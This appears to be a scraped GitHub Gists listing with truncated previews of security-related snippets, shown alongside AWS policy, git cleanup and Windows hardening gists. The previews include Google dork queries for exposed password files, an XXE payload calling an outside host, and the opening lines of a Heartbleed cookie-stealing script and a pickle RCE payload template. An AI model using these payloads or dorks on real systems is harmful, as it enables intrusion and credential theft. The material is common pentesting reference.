- Recipes
- Anonymous GET access
- Anonymous GET access - match HTTP referrer
- Full access for specific IAM user/role
- GET/PUT/DELETE access to specific path within a bucket
- Restricted LIST & PUT/DELETE access to specific path within a bucket
- Full access (and S3 console) for specific IAM users
- Bucket and object delete deny
David Dlat
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # file: merger.py | |
| # based off: http://cmikavac.net/2011/07/09/merging-multiple-nessus-scans-python-script/ | |
| # by: mastahyeti | |
| import xml.etree.ElementTree as etree | |
| import shutil | |
| import os | |
| first = 1 | |
| for fileName in os.listdir("."): |
cmartinbaughman
/ GoogleHackMasterList.txt
Last active
July 6, 2024 23:16
The definitive super list for "Google Hacking".
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| admin account info" filetype:log | |
| !Host=*.* intext:enc_UserPassword=* ext:pcf | |
| "# -FrontPage-" ext:pwd inurl:(service | authors | administrators | users) "# -FrontPage-" inurl:service.pwd | |
| "AutoCreate=TRUE password=*" | |
| "http://*:*@www” domainname | |
| "index of/" "ws_ftp.ini" "parent directory" | |
| "liveice configuration file" ext:cfg -site:sourceforge.net | |
| "parent directory" +proftpdpasswd | |
| Duclassified" -site:duware.com "DUware All Rights reserved" | |
| duclassmate" -site:duware.com |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # From https://help.github.com/articles/remove-sensitive-data | |
| # If you haven't done it yet: | |
| git rm thefile.ext | |
| # And to purge it from history | |
| git filter-branch --force --index-filter 'git rm --cached --ignore-unmatch thefile.ext' --prune-empty --tag-name-filter cat -- --all |
mpdavis
/ heartbleed-altered.py
Created
April 8, 2014 18:58
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # Connects to servers vulnerable to CVE-2014-0160 and looks for cookies, specifically user sessions. | |
| # Michael Davis (mike.philip.davis@gmail.com) | |
| # Based almost entirely on the quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org) | |
| # The author disclaims copyright to this source code. | |
| import select |
magnetikonline
/ README.md
Last active
November 22, 2023 06:42
AWS S3 bucket and IAM policy recipes.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -------------------------------------------------------------- | |
| Vanilla, used to verify outbound xxe or blind xxe | |
| -------------------------------------------------------------- | |
| <?xml version="1.0" ?> | |
| <!DOCTYPE r [ | |
| <!ELEMENT r ANY > | |
| <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
| ]> | |
| <r>&sp;</r> |
mgeeky
/ pickle-payload.py
Last active
July 9, 2024 07:55
Python's Pickle Remote Code Execution payload template.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # | |
| # Pickle deserialization RCE payload. | |
| # To be invoked with command to execute at it's first parameter. | |
| # Otherwise, the default one will be used. | |
| # | |
| import cPickle | |
| import sys | |
| import base64 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| git clone https://github.com/hashcat/hashcat.git | |
| mkdir -p hashcat/deps | |
| git clone https://github.com/KhronosGroup/OpenCL-Headers.git hashcat/deps/OpenCL | |
| cd hashcat/ && make | |
| ./hashcat --version | |
| ./hashcat -b -D 1,2 | |
| ./example0.sh |
mackwage
/ windows_hardening.cmd
Last active
July 26, 2024 17:50
Script to perform some hardening of Windows OS
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| :: Windows 10 Hardening Script | |
| :: This is based mostly on my own personal research and testing. My objective is to secure/harden Windows 10 as much as possible while not impacting usability at all. (Think being able to run on this computer's of family members so secure them but not increase the chances of them having to call you to troubleshoot something related to it later on). References for virtually all settings can be found at the bottom. Just before the references section, you will always find several security settings commented out as they could lead to compatibility issues in common consumer setups but they're worth considering. | |
| :: Obligatory 'views are my own'. :) | |
| :: Thank you @jaredhaight for the Win Firewall config recommendations! | |
| :: Thank you @ricardojba for the DLL Safe Order Search reg key! | |
| :: Thank you @jessicaknotts for the help on testing Exploit Guard configs and checking privacy settings! | |
| :: Best script I've found for Debloating Windows 10: https://github.com/Sycnex/Windows10Debloater | |
| : |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ::########################################################################################################################## | |
| :: | |
| :: This script can ruin your day, if you run it without fully understanding what it does, you don't know what you are doing, | |
| :: | |
| :: OR BOTH!!! | |
| :: | |
| :: YOU HAVE BEEN WARNED!!!!!!!!!! | |
| :: | |
| :: This script is provided "AS IS" with no warranties, and confers no rights. | |
| :: Feel free to challenge me, disagree with me, or tell me I'm completely nuts in the comments section, |
OlderNewer